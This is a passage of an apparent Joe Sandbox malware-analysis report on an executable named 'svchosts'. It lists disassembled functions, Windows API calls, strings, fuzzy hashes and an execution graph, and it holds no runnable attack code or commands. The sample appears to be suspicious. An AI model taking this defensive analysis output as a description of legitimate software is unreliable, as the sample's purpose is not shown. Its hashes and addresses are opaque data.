                                                                      • Instruction Fuzzy Hash: 6241A671824218AAEF20EB54CD59EEEB37CEF41300F0040EAB609A3092DB745FA4DF61
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: UNC$\\?\
                                                                      • API String ID: 0-253988292
                                                                      • Opcode ID: 40fd7c82f106210226f50ae96d9cb8cac07c49f53b63b895105f63fde960a7ee
                                                                      • Instruction ID: 9362191846118430a8a49fd14a215e34b6a57dc22f4189415f8d1514018ccf2a
                                                                      • Opcode Fuzzy Hash: 40fd7c82f106210226f50ae96d9cb8cac07c49f53b63b895105f63fde960a7ee
                                                                      • Instruction Fuzzy Hash: EF41273642021ABACF22AFA1ED41EEBB76DAF41750F004635F844D7152E770D970CE60
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Shell.Explorer$about:blank
                                                                      • API String ID: 0-874089819
                                                                      • Opcode ID: 53717f12db01d406b02ee01c7ae5c930278353f443ecc973d0ea60caf2add3c7
                                                                      • Instruction ID: 49d246d1cd6aadcfd929d4eacf61d0334a57ee55ef80b877d33f158e7423fa8a
                                                                      • Opcode Fuzzy Hash: 53717f12db01d406b02ee01c7ae5c930278353f443ecc973d0ea60caf2add3c7
                                                                      • Instruction Fuzzy Hash: 3A217E712243059FDB18EF65D895A2A77A8FF4A711B14C56EF8098B282DF70EC61CF60
                                                                      APIs
                                                                      • DialogBoxParamW.USER32(GETPASSWORD1,00010450,002AA990,?,?), ref: 002AD4C5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: DialogParam
                                                                      • String ID: GETPASSWORD1$xj.
                                                                      • API String ID: 665744214-2247023717
                                                                      • Opcode ID: 252831c861e549951a5ff6670c6ccc22ffbfc4305e7a0d6d75a54e127fa23d15
                                                                      • Instruction ID: 28c3a5abc03f80aa6fd3b7637196b0de6527983a766e3da6d69d5b26de58a01b
                                                                      • Opcode Fuzzy Hash: 252831c861e549951a5ff6670c6ccc22ffbfc4305e7a0d6d75a54e127fa23d15
                                                                      • Instruction Fuzzy Hash: 66113B72A30245ABDF22DE34AC05BAB3798B70B750F144079BD46A7191CFB06C64C760
                                                                      APIs
                                                                        • Part of subcall function 0029EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0029EB92
                                                                        • Part of subcall function 0029EB73: GetProcAddress.KERNEL32(002D81C0,CryptUnprotectMemory), ref: 0029EBA2
                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,0029EBEC), ref: 0029EC84
                                                                      Strings
                                                                      • CryptProtectMemory failed, xrefs: 0029EC3B
                                                                      • CryptUnprotectMemory failed, xrefs: 0029EC7C
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$CurrentProcess
                                                                      • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                      • API String ID: 2190909847-396321323
                                                                      • Opcode ID: fe13aff8f883ba306ad9c0fd1ed2084a730ff3909b41fe8cce3f4098f86cbc63
                                                                      • Instruction ID: 990b156d7b8465fe5395f76ff3c674e1f8c335ea30e22e665b466169f221d4bf
                                                                      • Opcode Fuzzy Hash: fe13aff8f883ba306ad9c0fd1ed2084a730ff3909b41fe8cce3f4098f86cbc63
                                                                      • Instruction Fuzzy Hash: 8A115931A25225AFDF14DF34ED0ABAE7754EF00710B06811BFC856B281CB759E2187D0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID: X,
                                                                      • API String ID: 269201875-3991676738
                                                                      • Opcode ID: 9ec0fb201a83e0240826fca9584295b05e3853a83dbbf18aacae0934fffd4ad9
                                                                      • Instruction ID: f149743b2775ab90887b2a024687bce152e4db4d3ac9a2bc9cf3ede1d8766ab6
                                                                      • Opcode Fuzzy Hash: 9ec0fb201a83e0240826fca9584295b05e3853a83dbbf18aacae0934fffd4ad9
                                                                      • Instruction Fuzzy Hash: DE11DA71A2022186EB209F78BC45FA637986B553F4F550226FA25CA2D0E771C8B1C740
                                                                      APIs
                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 002AF25E
                                                                      • ___raise_securityfailure.LIBCMT ref: 002AF345
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                      • String ID: 8/
                                                                      • API String ID: 3761405300-3410374190
                                                                      • Opcode ID: 071d3a09f59a06d52706b92e2a779b6de7469ce87f6c8a88dd24ed08a6c2ff78
                                                                      • Instruction ID: 930dd03377efdd3300271165e45a58565effb239cc46fb17ddaddbc12e107a75
                                                                      • Opcode Fuzzy Hash: 071d3a09f59a06d52706b92e2a779b6de7469ce87f6c8a88dd24ed08a6c2ff78
                                                                      • Instruction Fuzzy Hash: 352125B95603048BD754DF54FEC9B207BA4FB4D3A0F60583AE9088B3A2E3B56994CF45
                                                                      APIs
                                                                      • CreateThread.KERNEL32(00000000,00010000,002A09D0,?,00000000,00000000), ref: 002A08AD
                                                                      • SetThreadPriority.KERNEL32(?,00000000), ref: 002A08F4
                                                                        • Part of subcall function 00296E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00296EAF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                      • String ID: CreateThread failed
                                                                      • API String ID: 2655393344-3849766595
                                                                      • Opcode ID: 03b699b43700db2abc672ec15a58e947a9763d4dca36f67dd57edc67287b230b
                                                                      • Instruction ID: 2aaec29cba78204fd66f557c77c039c354aaeff0fa534878ca9d30a18cc635ed
                                                                      • Opcode Fuzzy Hash: 03b699b43700db2abc672ec15a58e947a9763d4dca36f67dd57edc67287b230b
                                                                      • Instruction Fuzzy Hash: CB01F9B23643066FD630AF54FCCAF6B7398EB42711F20043EF98652180CEA1AC609A64
                                                                      APIs
                                                                        • Part of subcall function 002B8FA5: GetLastError.KERNEL32(?,002D0EE8,002B3E14,002D0EE8,?,?,002B3713,00000050,?,002D0EE8,00000200), ref: 002B8FA9
                                                                        • Part of subcall function 002B8FA5: _free.LIBCMT ref: 002B8FDC
                                                                        • Part of subcall function 002B8FA5: SetLastError.KERNEL32(00000000,?,002D0EE8,00000200), ref: 002B901D
                                                                        • Part of subcall function 002B8FA5: _abort.LIBCMT ref: 002B9023
                                                                      • _abort.LIBCMT ref: 002BB2E0
                                                                      • _free.LIBCMT ref: 002BB314
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast_abort_free
                                                                      • String ID: ,
                                                                      • API String ID: 289325740-609127500
                                                                      • Opcode ID: 4d66242b2b8e54bf96da5d5bd92b7fbbdde834e3266dd32dcacda6fa45484949
                                                                      • Instruction ID: 61f5be679fb61a97235071459cd767b12dc95869081eadda54da98e189c0f2e4
                                                                      • Opcode Fuzzy Hash: 4d66242b2b8e54bf96da5d5bd92b7fbbdde834e3266dd32dcacda6fa45484949
                                                                      • Instruction Fuzzy Hash: 42019631D31622DFCB269F59980169DB3B8BF047A1B1A014AE86567681CBB06D62CFC1
                                                                      APIs
                                                                        • Part of subcall function 0029DA98: _swprintf.LIBCMT ref: 0029DABE
                                                                        • Part of subcall function 0029DA98: _strlen.LIBCMT ref: 0029DADF
                                                                        • Part of subcall function 0029DA98: SetDlgItemTextW.USER32(?,002CE154,?), ref: 0029DB3F
                                                                        • Part of subcall function 0029DA98: GetWindowRect.USER32(?,?), ref: 0029DB79
                                                                        • Part of subcall function 0029DA98: GetClientRect.USER32(?,?), ref: 0029DB85
                                                                      • GetDlgItem.USER32(00000000,00003021), ref: 0029134F
                                                                      • SetWindowTextW.USER32(00000000,002C35B4), ref: 00291365
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                      • String ID: 0
                                                                      • API String ID: 2622349952-4108050209
                                                                      • Opcode ID: 8d42f73391149a5fa6ef89ead2f7ef1c5b31498108e99ca9a141ad4017287df8
                                                                      • Instruction ID: 51a9b777e7f85dc32657d4a7cd60c1047ff30d2a4eebe775069f1fea8da81675
                                                                      • Opcode Fuzzy Hash: 8d42f73391149a5fa6ef89ead2f7ef1c5b31498108e99ca9a141ad4017287df8
                                                                      • Instruction Fuzzy Hash: 09F08C3013024EA6DF254F62980DBFA3BA8BF25395F088494BD49546A1C774C9B5EA18
                                                                      APIs
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,002A0A78,?), ref: 002A0854
                                                                      • GetLastError.KERNEL32(?), ref: 002A0860
                                                                        • Part of subcall function 00296E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00296EAF
                                                                      Strings
                                                                      • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 002A0869
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                      • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                      • API String ID: 1091760877-2248577382
                                                                      • Opcode ID: d9684fa72b3220be6519696e4732b08f33b261d1236ab04e379fbcac5c4a2c11
                                                                      • Instruction ID: 51f9b80008dcd36816823411f7d63b8b71f46b9703bc754a70d6ee38974f36f1
                                                                      • Opcode Fuzzy Hash: d9684fa72b3220be6519696e4732b08f33b261d1236ab04e379fbcac5c4a2c11
                                                                      • Instruction Fuzzy Hash: 41D05E329280212BCA107724EC0EEAF79559F52770F204B19F679652F5DE210D7186DA
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,0029D32F,?), ref: 0029DA53
                                                                      • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0029D32F,?), ref: 0029DA61
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: FindHandleModuleResource
                                                                      • String ID: RTL
                                                                      • API String ID: 3537982541-834975271
                                                                      • Opcode ID: d49e24e3bbf4c139f99e2112f31adc2b9062dbb1785c7b8bcbc9c80233404362
                                                                      • Instruction ID: cb987467064318c5c9a918bc3da0de57c1a4ba245b55d7846f30e01d33d0a673
                                                                      • Opcode Fuzzy Hash: d49e24e3bbf4c139f99e2112f31adc2b9062dbb1785c7b8bcbc9c80233404362
                                                                      • Instruction Fuzzy Hash: 54C01232299350B6EB30AB207C0DF832A486F11B12F09484CB245DA2D0DAE5CA5086A1

                                                                      Execution Graph

                                                                      Execution Coverage:3%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:624
                                                                      Total number of Limit Nodes:15
                                                                      execution_graph 53366 7ffe10249f94 53367 7ffe10249fa7 53366->53367 53367->53367 53368 7ffe1024a006 53367->53368 53370 7ffe1024a078 00007FFDFB434214 53367->53370 53371 7ffe1024a0ac 53370->53371 53373 7ffe1024a0b4 53370->53373 53374 7ffe1024c034 00007FFE1FB1B9F0 53371->53374 53373->53368 53376 7ffe1024c072 53374->53376 53377 7ffe1024c06e 53374->53377 53375 7ffe1024c076 00007FFE1FB1B9F0 53375->53376 53376->53375 53376->53377 53377->53373 53378 7ff76d5c2d00 53379 7ff76d5c2d10 53378->53379 53380 7ff76d5c2d61 53379->53380 53381 7ff76d5c2d4b 53379->53381 53383 7ff76d5c2d81 53380->53383 53393 7ff76d5c2d97 __std_exception_copy 53380->53393 53434 7ff76d5c25f0 53 API calls _log10_special 53381->53434 53435 7ff76d5c25f0 53 API calls _log10_special 53383->53435 53388 7ff76d5c3069 53451 7ff76d5c25f0 53 API calls _log10_special 53388->53451 53391 7ff76d5c3053 53450 7ff76d5c25f0 53 API calls _log10_special 53391->53450 53393->53388 53393->53391 53394 7ff76d5c302d 53393->53394 53396 7ff76d5c2f27 53393->53396 53405 7ff76d5c2d57 __std_exception_copy 53393->53405 53406 7ff76d5c1440 53393->53406 53430 7ff76d5c1bf0 53393->53430 53449 7ff76d5c25f0 53 API calls _log10_special 53394->53449 53397 7ff76d5c2f93 53396->53397 53445 7ff76d5d9714 37 API calls 2 library calls 53396->53445 53399 7ff76d5c2fb0 53397->53399 53400 7ff76d5c2fbe 53397->53400 53446 7ff76d5d9714 37 API calls 2 library calls 53399->53446 53447 7ff76d5c2af0 37 API calls 53400->53447 53403 7ff76d5c2fbc 53448 7ff76d5c2470 54 API calls __std_exception_copy 53403->53448 53436 7ff76d5cb870 53405->53436 53452 7ff76d5c3f70 53406->53452 53409 7ff76d5c148c 53462 7ff76d5cf9f4 53409->53462 53410 7ff76d5c146b 53488 7ff76d5c25f0 53 API calls _log10_special 53410->53488 53413 7ff76d5c147b 53413->53393 53414 7ff76d5c14a1 53415 7ff76d5c14c1 53414->53415 53416 7ff76d5c14a5 53414->53416 53418 7ff76d5c14f1 53415->53418 53419 7ff76d5c14d1 53415->53419 53489 7ff76d5c2760 53 API calls 2 library calls 53416->53489 53422 7ff76d5c14f7 53418->53422 53427 7ff76d5c150a 53418->53427 53490 7ff76d5c2760 53 API calls 2 library calls 53419->53490 53466 7ff76d5c11f0 53422->53466 53423 7ff76d5c1584 53423->53393 53425 7ff76d5c14bc __std_exception_copy 53484 7ff76d5cf36c 53425->53484 53427->53425 53428 7ff76d5c1596 53427->53428 53491 7ff76d5cf6bc 53427->53491 53494 7ff76d5c2760 53 API calls 2 library calls 53428->53494 53431 7ff76d5c1c15 53430->53431 53733 7ff76d5d3ca4 53431->53733 53434->53405 53435->53405 53437 7ff76d5cb879 53436->53437 53438 7ff76d5c2f1a 53437->53438 53439 7ff76d5cbc00 IsProcessorFeaturePresent 53437->53439 53440 7ff76d5cbc18 53439->53440 53760 7ff76d5cbdf8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 53440->53760 53442 7ff76d5cbc2b 53761 7ff76d5cbbc0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53442->53761 53445->53397 53446->53403 53447->53403 53448->53405 53449->53405 53450->53405 53451->53405 53453 7ff76d5c3f7c 53452->53453 53495 7ff76d5c86b0 53453->53495 53455 7ff76d5c3fa4 53456 7ff76d5c86b0 2 API calls 53455->53456 53457 7ff76d5c3fb7 53456->53457 53500 7ff76d5d52a4 53457->53500 53460 7ff76d5cb870 _log10_special 8 API calls 53461 7ff76d5c1463 53460->53461 53461->53409 53461->53410 53463 7ff76d5cfa24 53462->53463 53668 7ff76d5cf784 53463->53668 53465 7ff76d5cfa3d 53465->53414 53467 7ff76d5c1248 53466->53467 53468 7ff76d5c124f 53467->53468 53469 7ff76d5c1277 53467->53469 53685 7ff76d5c25f0 53 API calls _log10_special 53468->53685 53472 7ff76d5c1291 53469->53472 53473 7ff76d5c12ad 53469->53473 53471 7ff76d5c1262 53471->53425 53686 7ff76d5c2760 53 API calls 2 library calls 53472->53686 53475 7ff76d5c12bf 53473->53475 53482 7ff76d5c12db memcpy_s 53473->53482 53687 7ff76d5c2760 53 API calls 2 library calls 53475->53687 53477 7ff76d5cf6bc _fread_nolock 53 API calls 53477->53482 53478 7ff76d5c12a8 __std_exception_copy 53478->53425 53479 7ff76d5c139f 53688 7ff76d5c25f0 53 API calls _log10_special 53479->53688 53482->53477 53482->53478 53482->53479 53483 7ff76d5cf430 37 API calls 53482->53483 53681 7ff76d5cfdfc 53482->53681 53483->53482 53485 7ff76d5cf39c 53484->53485 53705 7ff76d5cf148 53485->53705 53487 7ff76d5cf3b5 53487->53423 53488->53413 53489->53425 53490->53425 53717 7ff76d5cf6dc 53491->53717 53494->53425 53496 7ff76d5c86f6 53495->53496 53497 7ff76d5c86d2 MultiByteToWideChar 53495->53497 53498 7ff76d5c8713 MultiByteToWideChar 53496->53498 53499 7ff76d5c870c __std_exception_copy 53496->53499 53497->53496 53497->53499 53498->53499 53499->53455 53503 7ff76d5d51d8 53500->53503 53501 7ff76d5d51fe 53531 7ff76d5d43f4 11 API calls _set_fmode 53501->53531 53503->53501 53505 7ff76d5d5231 53503->53505 53504 7ff76d5d5203 53532 7ff76d5d9bf0 37 API calls _invalid_parameter_noinfo 53504->53532 53507 7ff76d5d5244 53505->53507 53508 7ff76d5d5237 53505->53508 53519 7ff76d5d9f38 53507->53519 53533 7ff76d5d43f4 11 API calls _set_fmode 53508->53533 53509 7ff76d5c3fc6 53509->53460 53513 7ff76d5d5265 53526 7ff76d5df1dc 53513->53526 53514 7ff76d5d5258 53534 7ff76d5d43f4 11 API calls _set_fmode 53514->53534 53517 7ff76d5d5278 53535 7ff76d5d4788 LeaveCriticalSection 53517->53535 53536 7ff76d5df5e8 EnterCriticalSection 53519->53536 53521 7ff76d5d9f4f 53522 7ff76d5d9fac 19 API calls 53521->53522 53523 7ff76d5d9f5a 53522->53523 53524 7ff76d5df648 _isindst LeaveCriticalSection 53523->53524 53525 7ff76d5d524e 53524->53525 53525->53513 53525->53514 53537 7ff76d5deed8 53526->53537 53530 7ff76d5df236 53530->53517 53531->53504 53532->53509 53533->53509 53534->53509 53542 7ff76d5def13 __vcrt_FlsAlloc 53537->53542 53539 7ff76d5df1b1 53556 7ff76d5d9bf0 37 API calls _invalid_parameter_noinfo 53539->53556 53541 7ff76d5df0e3 53541->53530 53549 7ff76d5e6064 53541->53549 53547 7ff76d5df0da 53542->53547 53552 7ff76d5d6d4c 51 API calls 3 library calls 53542->53552 53544 7ff76d5df145 53544->53547 53553 7ff76d5d6d4c 51 API calls 3 library calls 53544->53553 53546 7ff76d5df164 53546->53547 53554 7ff76d5d6d4c 51 API calls 3 library calls 53546->53554 53547->53541 53555 7ff76d5d43f4 11 API calls _set_fmode 53547->53555 53557 7ff76d5e5664 53549->53557 53552->53544 53553->53546 53554->53547 53555->53539 53556->53541 53558 7ff76d5e567b 53557->53558 53559 7ff76d5e5699 53557->53559 53611 7ff76d5d43f4 11 API calls _set_fmode 53558->53611 53559->53558 53562 7ff76d5e56b5 53559->53562 53561 7ff76d5e5680 53612 7ff76d5d9bf0 37 API calls _invalid_parameter_noinfo 53561->53612 53568 7ff76d5e5c74 53562->53568 53565 7ff76d5e568c 53565->53530 53614 7ff76d5e59a8 53568->53614 53571 7ff76d5e5d01 53634 7ff76d5d7830 53571->53634 53572 7ff76d5e5ce9 53646 7ff76d5d43d4 11 API calls _set_fmode 53572->53646 53576 7ff76d5e5cee 53647 7ff76d5d43f4 11 API calls _set_fmode 53576->53647 53587 7ff76d5e56e0 53587->53565 53613 7ff76d5d7808 LeaveCriticalSection 53587->53613 53611->53561 53612->53565 53615 7ff76d5e59d4 53614->53615 53623 7ff76d5e59ee 53614->53623 53615->53623 53659 7ff76d5d43f4 11 API calls _set_fmode 53615->53659 53617 7ff76d5e59e3 53660 7ff76d5d9bf0 37 API calls _invalid_parameter_noinfo 53617->53660 53619 7ff76d5e5abd 53633 7ff76d5e5b1a 53619->53633 53665 7ff76d5d8e90 37 API calls 2 library calls 53619->53665 53620 7ff76d5e5a6c 53620->53619 53663 7ff76d5d43f4 11 API calls _set_fmode 53620->53663 53623->53620 53661 7ff76d5d43f4 11 API calls _set_fmode 53623->53661 53624 7ff76d5e5b16 53629 7ff76d5e5b98 53624->53629 53624->53633 53625 7ff76d5e5ab2 53664 7ff76d5d9bf0 37 API calls _invalid_parameter_noinfo 53625->53664 53628 7ff76d5e5a61 53662 7ff76d5d9bf0 37 API calls _invalid_parameter_noinfo 53628->53662 53666 7ff76d5d9c10 17 API calls _isindst 53629->53666 53633->53571 53633->53572 53667 7ff76d5df5e8 EnterCriticalSection 53634->53667 53646->53576 53647->53587 53659->53617 53660->53623 53661->53628 